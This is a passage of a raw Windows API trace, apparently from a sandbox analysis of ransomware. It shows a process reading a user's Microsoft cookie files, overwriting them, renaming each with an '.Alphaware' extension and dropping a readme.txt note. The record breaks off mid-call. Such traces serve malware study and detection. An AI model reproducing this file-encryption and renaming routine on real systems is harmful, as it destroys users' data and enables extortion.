GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\keecfmwgj@login.microsoftonline[2].txt.Alphaware", nBufferLength=0x105, lpBuffer=0x23e530, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\keecfmwgj@login.microsoftonline[2].txt.Alphaware", lpFilePart=0x0) returned 0x6d [0094.003] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e748) returned 1 [0094.003] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\keecfmwgj@login.microsoftonline[2].txt" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\cookies\\keecfmwgj@login.microsoftonline[2].txt"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x76abed20, ftCreationTime.dwHighDateTime=0x1d7b064, ftLastAccessTime.dwLowDateTime=0x76abed20, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0x8a39fda0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x2f4)) returned 1 [0094.003] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e6f8) returned 1 [0094.003] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\keecfmwgj@login.microsoftonline[2].txt" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\cookies\\keecfmwgj@login.microsoftonline[2].txt"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\keecfmwgj@login.microsoftonline[2].txt.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\cookies\\keecfmwgj@login.microsoftonline[2].txt.alphaware")) returned 1 [0094.005] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\readme.txt", nBufferLength=0x105, lpBuffer=0x23e350, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\readme.txt", lpFilePart=0x0) returned 0x47 [0094.005] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e868) returned 1 [0094.005] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\readme.txt" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\cookies\\readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0094.006] GetFileType (hFile=0x250) returned 0x1 [0094.006] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7d8) returned 1 [0094.006] GetFileType (hFile=0x250) returned 0x1 [0094.007] WriteFile (in: hFile=0x250, lpBuffer=0x24d4918*, nNumberOfBytesToWrite=0x49d, lpNumberOfBytesWritten=0x23e908, lpOverlapped=0x0 | out: lpBuffer=0x24d4918*, lpNumberOfBytesWritten=0x23e908*=0x49d, lpOverlapped=0x0) returned 1 [0094.010] CloseHandle (hObject=0x250) returned 1 [0094.010] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\keecfmwgj@microsoft[2].txt", nBufferLength=0x105, lpBuffer=0x23e5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\keecfmwgj@microsoft[2].txt", lpFilePart=0x0) returned 0x57 [0094.011] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\keecfmwgj@microsoft[2].txt", dwFileAttributes=0x80) returned 1 [0094.018] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e818) returned 1 [0094.018] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\keecfmwgj@microsoft[2].txt" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\cookies\\keecfmwgj@microsoft[2].txt"), fInfoLevelId=0x0, lpFileInformation=0x24d5c00 | out: lpFileInformation=0x24d5c00*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x76a4c900, ftCreationTime.dwHighDateTime=0x1d7b064, ftLastAccessTime.dwLowDateTime=0x76a4c900, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0x76a4c900, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0xf4)) returned 1 [0094.018] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7c8) returned 1 [0094.018] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\keecfmwgj@microsoft[2].txt", nBufferLength=0x105, lpBuffer=0x23e390, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\keecfmwgj@microsoft[2].txt", lpFilePart=0x0) returned 0x57 [0094.018] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e8a8) returned 1 [0094.018] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\keecfmwgj@microsoft[2].txt" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\cookies\\keecfmwgj@microsoft[2].txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0094.019] GetFileType (hFile=0x250) returned 0x1 [0094.019] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e818) returned 1 [0094.019] GetFileType (hFile=0x250) returned 0x1 [0094.019] GetFileSize (in: hFile=0x250, lpFileSizeHigh=0x23ea28 | out: lpFileSizeHigh=0x23ea28*=0x0) returned 0xf4 [0094.019] ReadFile (in: hFile=0x250, lpBuffer=0x24d6010, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x24d6010*, lpNumberOfBytesRead=0x23e958*=0xf4, lpOverlapped=0x0) returned 1 [0094.020] CloseHandle (hObject=0x250) returned 1 [0094.086] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e7d8) returned 1 [0094.086] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\keecfmwgj@microsoft[2].txt" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\cookies\\keecfmwgj@microsoft[2].txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0094.087] GetFileType (hFile=0x250) returned 0x1 [0094.087] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e748) returned 1 [0094.087] GetFileType (hFile=0x250) returned 0x1 [0094.088] WriteFile (in: hFile=0x250, lpBuffer=0x2553b10*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x23e818, lpOverlapped=0x0 | out: lpBuffer=0x2553b10*, lpNumberOfBytesWritten=0x23e818*=0x220, lpOverlapped=0x0) returned 1 [0094.089] CloseHandle (hObject=0x250) returned 1 [0094.090] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e748) returned 1 [0094.090] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\keecfmwgj@microsoft[2].txt" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\cookies\\keecfmwgj@microsoft[2].txt"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x76a4c900, ftCreationTime.dwHighDateTime=0x1d7b064, ftLastAccessTime.dwLowDateTime=0x76a4c900, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0x8a45e480, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x220)) returned 1 [0094.090] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e6f8) returned 1 [0094.090] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\keecfmwgj@microsoft[2].txt" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\cookies\\keecfmwgj@microsoft[2].txt"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\keecfmwgj@microsoft[2].txt.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\cookies\\keecfmwgj@microsoft[2].txt.alphaware")) returned 1 [0094.092] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\keecfmwgj@support.microsoft[2].txt", nBufferLength=0x105, lpBuffer=0x23e5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\keecfmwgj@support.microsoft[2].txt", lpFilePart=0x0) returned 0x5f [0094.092] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\keecfmwgj@support.microsoft[2].txt", dwFileAttributes=0x80) returned 1 [0094.093] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e818) returned 1 [0094.093] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\keecfmwgj@support.microsoft[2].txt" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\cookies\\keecfmwgj@support.microsoft[2].txt"), fInfoLevelId=0x0, lpFileInformation=0x2554ef8 | out: lpFileInformation=0x2554ef8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x765178e0, ftCreationTime.dwHighDateTime=0x1d7b064, ftLastAccessTime.dwLowDateTime=0x76a4c900, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0x76a4c900, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x10c)) returned 1 [0094.093] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7c8) returned 1 [0094.093] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\keecfmwgj@support.microsoft[2].txt", nBufferLength=0x105, lpBuffer=0x23e390, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\keecfmwgj@support.microsoft[2].txt", lpFilePart=0x0) returned 0x5f [0094.093] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e8a8) returned 1 [0094.094] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\keecfmwgj@support.microsoft[2].txt" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\cookies\\keecfmwgj@support.microsoft[2].txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0094.094] GetFileType (hFile=0x250) returned 0x1 [0094.094] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e818) returned 1 [0094.094] GetFileType (hFile=0x250) returned 0x1 [0094.094] GetFileSize (in: hFile=0x250, lpFileSizeHigh=0x23ea28 | out: lpFileSizeHigh=0x23ea28*=0x0) returned 0x10c [0094.103] ReadFile (in: hFile=0x250, lpBuffer=0x2555378, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x2555378*, lpNumberOfBytesRead=0x23e958*=0x10c, lpOverlapped=0x0) returned 1 [0094.104] CloseHandle (hObject=0x250) returned 1 [0094.165] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e7d8) returned 1 [0094.166] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\keecfmwgj@support.microsoft[2].txt" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\cookies\\keecfmwgj@support.microsoft[2].txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0094.167] GetFileType (hFile=0x250) returned 0x1 [0094.167] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e748) returned 1 [0094.167] GetFileType (hFile=0x250) returned 0x1 [0094.169] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e748) returned 1 [0094.169] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\keecfmwgj@support.microsoft[2].txt" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\cookies\\keecfmwgj@support.microsoft[2].txt"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x765178e0, ftCreationTime.dwHighDateTime=0x1d7b064, ftLastAccessTime.dwLowDateTime=0x76a4c900, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0x8a542cc0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x234)) returned 1 [0094.169] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e6f8) returned 1 [0094.169] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\keecfmwgj@support.microsoft[2].txt" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\cookies\\keecfmwgj@support.microsoft[2].txt"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\keecfmwgj@support.microsoft[2].txt.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\cookies\\keecfmwgj@support.microsoft[2].txt.alphaware")) returned 1 [0094.171] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\keecfmwgj@support.microsoft[3].txt", dwFileAttributes=0x80) returned 1 [0094.172] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e818) returned 1 [0094.172] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\keecfmwgj@support.microsoft[3].txt" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\cookies\\keecfmwgj@support.microsoft[3].txt"), fInfoLevelId=0x0, lpFileInformation=0x23d5cc8 | out: lpFileInformation=0x23d5cc8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x765178e0, ftCreationTime.dwHighDateTime=0x1d7b064, ftLastAccessTime.dwLowDateTime=0x765178e0, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0x765178e0, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x226)) returned 1 [0094.172] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7c8) returned 1 [0094.173] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e8a8) returned 1 [0094.173] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\keecfmwgj@support.microsoft[3].txt" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\cookies\\keecfmwgj@support.microsoft[3].txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0094.173] GetFileType (hFile=0x250) returned 0x1 [0094.173] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e818) returned 1 [0094.173] GetFileType (hFile=0x250) returned 0x1 [0094.173] GetFileSize (in: hFile=0x250, lpFileSizeHigh=0x23ea28 | out: lpFileSizeHigh=0x23ea28*=0x0) returned 0x226 [0094.173] ReadFile (in: hFile=0x250, lpBuffer=0x23d6248, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x23d6248*, lpNumberOfBytesRead=0x23e958*=0x226, lpOverlapped=0x0) returned 1 [0094.174] CloseHandle (hObject=0x250) returned 1 [0094.265] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e7d8) returned 1 [0094.266] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\keecfmwgj@support.microsoft[3].txt" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\cookies\\keecfmwgj@support.microsoft[3].txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0094.267] GetFileType (hFile=0x250) returned 0x1 [0094.267] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e748) returned 1 [0094.267] GetFileType (hFile=0x250) returned 0x1 [0094.268] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e748) returned 1 [0094.268] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\keecfmwgj@support.microsoft[3].txt" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\cookies\\keecfmwgj@support.microsoft[3].txt"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x765178e0, ftCreationTime.dwHighDateTime=0x1d7b064, ftLastAccessTime.dwLowDateTime=0x765178e0, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0x8a627500, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x3b4)) returned 1 [0094.268] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e6f8) returned 1 [0094.269] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\keecfmwgj@support.microsoft[3].txt" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\cookies\\keecfmwgj@support.microsoft[3].txt"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\keecfmwgj@support.microsoft[3].txt.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\cookies\\keecfmwgj@support.microsoft[3].txt.alphaware")) returned 1 [0094.270] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea58) returned 1 [0094.270] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x795b3cd0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x8a627500, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x8a627500, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0094.270] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x799de350, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799de350, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x664d55e0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x8000, dwReserved0=0x0, dwReserved1=0x0, cFileName="index.dat", cAlternateFileName="")) returned 1 [0094.270] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x76abed20, ftCreationTime.dwHighDateTime=0x1d7b064, ftLastAccessTime.dwLowDateTime=0x76abed20, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0x8a39fda0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x2f4, dwReserved0=0x0, dwReserved1=0x0, cFileName="keecfmwgj@login.microsoftonline[2].txt.Alphaware", cAlternateFileName="KEECFM~1.ALP")) returned 1 [0094.270] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x76a4c900, ftCreationTime.dwHighDateTime=0x1d7b064, ftLastAccessTime.dwLowDateTime=0x76a4c900, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0x8a45e480, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x220, dwReserved0=0x0, dwReserved1=0x0, cFileName="keecfmwgj@microsoft[2].txt.Alphaware", cAlternateFileName="KEECFM~2.ALP")) returned 1 [0094.270] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x765178e0, ftCreationTime.dwHighDateTime=0x1d7b064, ftLastAccessTime.dwLowDateTime=0x76a4c900, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0x8a542cc0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x234, dwReserved0=0x0, dwReserved1=0x0, cFileName="keecfmwgj@support.microsoft[2].txt.Alphaware", cAlternateFileName="KEECFM~3.ALP")) returned 1 [0094.270] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x765178e0, ftCreationTime.dwHighDateTime=0x1d7b064, ftLastAccessTime.dwLowDateTime=0x765178e0, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0x8a627500, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x3b4, dwReserved0=0x0, dwReserved1=0x0, cFileName="keecfmwgj@support.microsoft[3].txt.Alphaware", cAlternateFileName="KEECFM~4.ALP")) returned 1 [0094.270] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7cda41d0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7cda41d0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7cda41d0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Low", cAlternateFileName="")) returned 1 [0094.271] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8a39fda0, ftCreationTime.dwHighDateTime=0x1d9897a, ftLastAccessTime.dwLowDateTime=0x8a39fda0, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x8a3c5f00, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x49d, dwReserved0=0x0, dwReserved1=0x0, cFileName="readme.txt", cAlternateFileName="")) returned 1 [0094.271] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8a39fda0, ftCreationTime.dwHighDateTime=0x1d9897a, ftLastAccessTime.dwLowDateTime=0x8a39fda0, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x8a3c5f00, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x49d, dwReserved0=0x0, dwReserved1=0x0, cFileName="readme.txt", cAlternateFileName="")) returned 0 [0094.271] FindClose (in: hFindFile=0xd8a310 | out: hFindFile=0xd8a310) returned 1 [0094.271] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e758) returned 1 [0094.271] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e978) returned 1 [0094.271] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9b8) returned 1 [0094.272] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e790 | out: lpFindFileData=0x23e790*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7cda41d0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7cda41d0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7cda41d0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0094.272] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e790 | out: lpFindFileData=0x23e790*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7cda41d0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7cda41d0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7cda41d0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0094.272] FindClose (in: hFindFile=0xd8a310 | out: hFindFile=0xd8a310) returned 1 [0094.272] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e6b8) returned 1 [0094.272] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8d8) returned 1 [0094.273] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9b8) returned 1 [0094.273] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e790 | out: lpFindFileData=0x23e790*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7cda41d0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7cda41d0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7cda41d0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0094.273] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e790 | out: lpFindFileData=0x23e790*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7cda41d0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7cda41d0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7cda41d0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0094.273] FindClose (in: hFindFile=0xd8a310 | out: hFindFile=0xd8a310) returned 1 [0094.273] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e6b8) returned 1 [0094.273] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8d8) returned 1 [0094.273] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea58) returned 1 [0094.275] FindNextFileW (in: hFindFile=0xd8a310, 